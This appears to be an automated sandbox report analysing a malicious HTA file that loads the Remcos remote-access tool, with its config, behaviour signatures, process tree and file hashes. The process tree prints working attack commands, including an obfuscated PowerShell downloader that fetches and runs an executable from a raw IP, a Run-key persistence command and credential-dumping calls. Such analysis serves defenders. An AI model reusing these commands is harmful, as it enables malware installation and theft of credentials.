Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25-09-2024 07:03
General
-
Target
e9e36b1d6323ad3225e16dd0d6992140.hta
-
Size
115KB
-
MD5
e9e36b1d6323ad3225e16dd0d6992140
-
SHA1
a60f66174b84e52d090137011bc58d0e4e3d2d68
-
SHA256
4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82
-
SHA512
b274ad46d1b701a574e782c7c96f8717eff52e193305666288f12fa8860f25eacced86b1024c0cc3f2951b20c8c9d05772e03191cbf419b3cc9e21c668688d17
-
SSDEEP
48:7oa+apd7Ah23j0eQqYaH5PqYa8h7j5glG8smrVZA99Ddv2dzjZlUqYaXHqYaAhFj:Ea+M7xQOPNTUfofF2VoYHLzLHjrUAT
Malware Config
Extracted
remcos
Rem_doc2
107.173.4.16:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-DSGECX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Detected Nirsoft tools 6 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e9e36b1d6323ad3225e16dd0d6992140.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jm0mguqy\jm0mguqy.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E65.tmp" "c:\Users\Admin\AppData\Local\Temp\jm0mguqy\CSC578EAEE987534AC285E3C17D0A90E6.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Lysintensiteters=Get-Content 'C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Maxiernes95\Rabarbergrden.Afm';$Chunderous=$Lysintensiteters.SubString(56880,3);.$Chunderous($Lysintensiteters)"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\salited.exe"C:\Users\Admin\AppData\Local\Temp\salited.exe"6⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Temp\salited.exeC:\Users\Admin\AppData\Local\Temp\salited.exe /stext "C:\Users\Admin\AppData\Local\Temp\mrmugdwyass"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\salited.exeC:\Users\Admin\AppData\Local\Temp\salited.exe /stext "C:\Users\Admin\AppData\Local\Temp\xlrmgwhzoakurv"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\salited.exeC:\Users\Admin\AppData\Local\Temp\salited.exe /stext "C:\Users\Admin\AppData\Local\Temp\hnwxhortcichcbgoj"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5fb1df442f2cee34456c6ed9064318559
SHA1729e8f61f181b303d25e1f709399db242d82c6c2
SHA25675207b26127c0778928b2c0ce51d371a1b4f5a4c47596902f88dbff9ddd16a79
SHA512d6df1b8e17733d65ae332d20a22fcbc2cdec8df38a705b694b4d87b2f0c9c287378791c3da2cb2142e95f31df1b4209e01a17a83eabfcb2175f38a9207ad0294
-
Filesize
19KB
MD579151828746af30b877bb784f94c27e2
SHA1c97c73c184a51f4e35fcd634ed32a533de551a17
SHA2569cc930fe620ada3a58e29616431683016a8cedc742925f8443e44f6c41bbd5d8
SHA512cac389998f0ab6e3b6d67de6f733a8d01c03767852190b193fda9759ac7b7d0a27589cf5144c81b4f9e693d9b3b5f3c41fca11aa23bad3cc2b78cf4062929e78
-
Filesize
1KB
MD523e5ac4bfba52253cb820fd25cc88106
SHA1dcd4cdb87eff4ef21f5122ee48197d520725384d
SHA256509d2b37dc671ed2aa2aa42675daeb4e1353c8d67d3b9e461f5b7eb0fe8eb320
SHA512489ff7f0e66226566c8996baa0d3c973962e7ba1040cb3160b82183de19c315ced71262786ea2dcde2f8a01d1c97859a4a9ea1a36090af7ba98b3038ebeb12fc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5617d214a9af7ad87f037c73b9413979f
SHA12c78fc3d609f05abe8c73170d42c1454a44f30b0
SHA256cfb9cb683174363e2ff090cb3047c7a68c2db6c184b21d6ba9d932cec9a93057
SHA5123a50d40738c3054337c13f84d9398d6014ea7594527c28c5117bd91ad7d0daa645b2b9b20438532238aeb7cd8bd39d5431add2303472e2dc459758b1833d51f8
-
Filesize
4KB
MD5ea01dd92b15d2f570f6b167dad2d1fd0
SHA17b89141d4c3eb2f29d096f28a9bfe66eb006224a
SHA2560515f49138d74283f9ac1042fd1a384f715b74c2b99193454dbb0cd585097727
SHA5120e7695aea30250a41829fa4abb681b8c3ed4c0955e18f1f9f3a5456bfb3a76f016f538e557bf29b99ab6ab48c846f9fa3c4bccd8cb5fe73099a81b5946029ec8
-
Filesize
658KB
MD5c5aceb5a91bf991604daec67bde90bc7
SHA166f965774fbee77e43d089281366d1256b312386
SHA256547ffc87de4f0a1aa0c3031152ba6297e1b0aa81e41fa1d5f97a63318137206d
SHA512a774095ba9c245ecb217fabbcc3f5a37d9678ef1e304543834a54eb554fb0735b761957cd254c30b5ee0e73638c2992580fffe68b1aadb824e76a8b10c375a6e
-
Filesize
314KB
MD5bdfb00f48094664301b955139669444b
SHA113dfa5fe6afabe51641e7080a73de52381544382
SHA256958388d7d8f5b6d68e801d8d597a6627c8cf63daf87cc9baa35bd0e5d270cfad
SHA5125490f651b643a7b3d0a2d501634dede26f481cde57123e3c6f942620adb3e72afbb266c262bb305545df58746832a1611946c8fcdd3a464c30d424658379960b
-
Filesize
55KB
MD5008e87be411ded72a46511a077bc91f1
SHA13ecdaa325cdad56e51b8799caee08d7d6c670bf7
SHA256a635b01f4ecc32a646bc2ad4eac2261ced6dced764427e4d7900c1bed66d874f
SHA51206da3f805dff9bc503f6e7507165362af82884023c77121c0057ab0f260311772e3efc72af6641b16543ad734aced21825db065d9109e1354066b70bf14c06a9
-
Filesize
652B
MD56306b1c1af2d73101498752a202bd74c
SHA198ad07fb25b84f3b6ba83f5e37bb2b5d8be16edd
SHA256fbcbaa3031933a537b1b029cb3e431a8a08e9f2f2078ff170fe8e819f6c311c4
SHA512dcf4647165eb18b2a29828bf9c1d5fc4c79a825ee825e002e6f4415b7b13eb1cf3b6456f7be30e60c67b2a40cd27f4ecefdbfb5187048944c8230b977dcbaca7
-
Filesize
479B
MD579d525f7443b9b32c04c66fdf771524a
SHA1760c943c817a688bd0ae6d07ffad1c4d4b5496f1
SHA2566a75cfe74270167848fea3d86e892883e9f43b9770da0200447561994dfd8d0d
SHA51288bc46830dcf9f48c93ce8da04fce858f17877a3720fb9fa5633052d81df22c84bc2fd5048af34a7285fac106de77446484c125c2d1b0f5fadaac7b05eaa99df
-
Filesize
369B
MD5a255132ff2a5571b9cac15b50b34096a
SHA1593c4377327ccee4535461e521e8d08e7560728f
SHA2561d6ab09a9c053b402657ef52000245905ed6befa37161078b2dc937a3f577646
SHA5126bb5cd9a651af172498b7bac3e4e3ce4ab5074cf538bef06aa85556c882d367fcea17e9d35eb70de6a8f40dda7e958a82d7906f638882a439bb949e254941aeb
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
37.7MB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
652KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
100KB
-
Filesize
37.7MB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB